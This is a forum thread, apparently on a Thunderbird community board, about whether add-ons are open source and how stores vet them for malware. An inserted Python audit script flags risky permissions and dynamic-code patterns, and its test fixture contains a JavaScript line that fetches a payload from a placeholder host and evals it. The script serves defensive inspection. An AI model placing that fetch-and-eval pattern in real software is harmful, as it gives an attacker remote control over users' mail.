Are all add-ons open source?

Hello, while looking for a suitable add-on for my needs, I saw that the permissions of an add-on can be very impactful (access to all emails, basically).

So I was wondering how secure the add-ons are.

I was then looking up whether all Thunderbird add-ons are open source but didn’t find an answer.

What I noticed was that some add-ons seem to have a link to their source code while others do not (and don’t share much else).

In the add-on I was interested in (Simple Template) I saw no reference to its source code.

So I was wondering if I must carefully select open source add-ons or if they are all open source.

If there are closed-source add-ons, how are they validated for security?

Thank you.

1 Like

Addons are third-party programs made by “random” people all over the world.
Some are open source, some not, some are made by hobby programmers, some by companies, some by malicious actors, some are OK and later sold to malicious actors.

In general, it’s best to assume the worst :smiley:, especially if you can’t tell if the addon author is a known and credible entity.

Note that even a “link to github” doesn’t mean anything - there is no “proof” the addon submitted to the store is actually built from the source code. A single extra line of code (a very long one) can be added to the addon during the build process.

Sadly, Thunderbird doesn’t have the Recommended badges for addons like Firefox does, which guarantee the addon and all its updates are always manually reviewed.

3 Likes

Honestly, this is pretty astonishing.

So any add-on could be malicious, or turn malicious any day.

And if I understood you right, there’s no way for a user to validate that it is not malicious.

I’m just wondering why there’s no policy or systematic approach to exclude, or at least minimize, the risk of malicious add-ons.

Well, there are automated checks that “verify” that the addon looks good.
But there are also ways to hide the real behavior.

Users can also report suspicious addons, but the Mozilla addons team is small and can check only a portion of these reports.

In any case, this is something that all third-party software stores are facing, and there are no easy solutions.
Check, for example, this article about the Chrome extension store :smiley: :

Regarding verifying the extension yourself - you could do that for smaller addons; there is this web tool built by a Mozilla engineer that allows you to inspect the code of any addon in any store:

But to be 100% safe, you would still have to disable updates.
Luckily, Thunderbird is not often targeted by malicious actors because it’s harder to monetize victims.

1 Like

This is a very important subject and responsibility, certainly in today’s movement with AI integrated into many pieces of software, while testing code made by it has become very important and a security priority.

Our advice for end users is to check addons’ permissions before installing, otherwise @juraj.masiar gave a detailed answer above.

I’m late to this thread, but wanted to share a couple of thoughts and provide some direct answers.

@juraj.masiar indirectly touched on this, but I want to be a bit more explicit: “open source” and “secure” are two very different things.

Even if an add-on isn’t “open source”, you can still pull it apart to see exactly what it’s doing. Firefox and Thunderbird add-ons are distributed as XPI files (basically renamed ZIP archives) and are built using standard web technologies (HTML, CSS, JS, JSON, etc.). Tools like @rob’s CRX Viewer make it much easier to take a peek inside an extension, but making sense of what’s in there requires some specialized knowledge.

Yes. And while I hate to say this, that’s also true of basically all software.

Mozilla’s Add-ons Policies do prohibit malicious add-ons, but as they say, a law is only as good as its enforcement.

As for the question about a systematic way to identify and stop malware… sigh that’s difficult. We can’t even know for sure if a program will ever stop running (commonly referred to as the Halting Problem) let alone whether it will do something bad while it is running.

This is further complicated by the fact that determining maliciousness is subjective and requires context. While most of the time disabling security headers on a website is bad, sometimes that’s exactly what we have to do as developers to identify and fix bugs. If you set up an app on your phone so you know its physical location at all times, that’s 100% fine. If you were to install that on someone else’s phone without their knowledge or consent, that’s 100% not fine.

Unfortunately disabling updates also doesn’t keep you 100% safe. Even if, to the best of all of our collective knowledge, a given piece of software is safe when it is released, it may contain a zero-day vulnerability that is later exploited.

In that situation, the best protection is to install security updates as quickly as possible. That’s exactly why browsers have moved over to an “evergreen” model where they automatically update themselves as the browser vendor releases updates.

1 Like

Any app store basically has security measures implemented which identify and exclude malicious apps. Surely the same with Outlook and its add-ons. And aggregators providing software libraries such as pypi.org probably too.

Security breaches may have happened on those platforms but anyhow they surely have measures to minimize the risk.

Can such measures not be used for Mozilla add-ons as well?

What I got from this discussion is that anybody can provide anything as an add-on and there is zero security check.

Perhaps very useful add-ons which have a high reputation could be transferred to a TB-maintained add-on; is that an approach?

It’s not that easy; modern malware doesn’t have to contain malware code when submitted to the store.
Instead, it can receive malware commands later on. It’s called “remote code execution”; it’s forbidden, and it’s hard to detect as there are a lot of creative ways to execute javascript code.

In any case, the situation is nicely summarized by one of the Chrome devs under the article I’ve linked:

Note also that Thunderbird has a very small development team; maybe I’m wrong, but I think it was only about 15 people, so this is not a huge corporation that could take over a bunch of addons and maintain them.

But I’m certain that soon, with modern AI, the automated checks will get much better at flagging “potential malware” before it’s published.
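As an added example, not code from this thread or from Mozilla: a small Python audit that does what the earlier post about XPI files and the post above about remote code execution describe. It opens an XPI as the ZIP archive it is, lists the mail-related permissions the manifest requests, and flags the dynamic-code patterns (eval and similar) that let an add-on run code it did not ship with. The permission list, the pattern list and the sample add-on are constructed for illustration and are not Mozilla’s review rules.

```python
import io
import json
import re
import zipfile

# Thunderbird MailExtension permissions that expose mail data (illustrative subset).
SENSITIVE_PERMISSIONS = {
    "messagesRead": "read every message body",
    "messagesModify": "alter or delete messages",
    "accountsRead": "list accounts and folders",
    "compose": "create or change outgoing mail",
    "<all_urls>": "contact any web host",
}

# Source patterns that let an add-on run code it did not ship with.
DYNAMIC_CODE_PATTERNS = {
    r"\beval\s*\(": "eval()",
    r"\bnew\s+Function\s*\(": "new Function()",
    r"\bsetTimeout\s*\(\s*['\"]": "setTimeout with a string body",
    r"\.innerHTML\s*=": "innerHTML assignment",
}

def audit_xpi(xpi_bytes):
    """Unpack an XPI held in memory; return (flagged permissions, [(file, line, label)])."""
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as z:
        manifest = json.loads(z.read("manifest.json"))
        perms = manifest.get("permissions", []) + manifest.get("host_permissions", [])
        flagged = {p: SENSITIVE_PERMISSIONS[p] for p in perms if p in SENSITIVE_PERMISSIONS}
        findings = []
        for name in z.namelist():
            if not name.endswith(".js"):
                continue
            src = z.read(name).decode("utf-8", errors="replace")
            for pattern, label in DYNAMIC_CODE_PATTERNS.items():
                for m in re.finditer(pattern, src):
                    findings.append((name, src.count("\n", 0, m.start()) + 1, label))
    return flagged, findings

def build_sample_xpi():
    """Constructed fixture: broad mail permissions plus a script that evaluates fetched code."""
    manifest = {"manifest_version": 2, "name": "Constructed Example", "version": "1.0",
                "permissions": ["messagesRead", "compose", "storage"],
                "background": {"scripts": ["background.js"]}}
    background = ('fetch("https://updates.example.invalid/payload.js")\n'
                  '  .then(r => r.text())\n'
                  '  .then(code => eval(code));\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("manifest.json", json.dumps(manifest))
        z.writestr("background.js", background)
    return buf.getvalue()
```

To check a real add-on, pass the bytes of the downloaded .xpi file to audit_xpi(); a hit only means the code deserves a closer look, not that the add-on is malicious.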

AMO has similar measures.

I see how the discussion might give that impression, but that wasn’t what I was trying to say.

My point was that software distribution platforms can’t guarantee the safety of the software they distribute. It’s impossible to completely eliminate the risk of malware. At the same time, these platforms invest a lot of energy in making sure the software they distribute is as safe as possible despite those challenges. It’s hard to do and they don’t always get it right. As a result, users should be very careful about what software they choose to run on their systems.

Unfortunately, the answer to “how safe is this Thunderbird add-on” comes down to the same kind of answer you’d get for basically any other piece of software: check the reviews and star rating on the store, look for reviews elsewhere, see if anyone has done a security analysis. There’s some amount of safety in using things that larger numbers of people are using because more people will be taking a look at what it’s doing. A better-polished user experience often has more developer time and energy put into making sure it’s a good product. But it’s important to be aware that these are just signals and that even big, well-respected products can have major security bugs or accidentally ship with malware without the developer’s knowledge.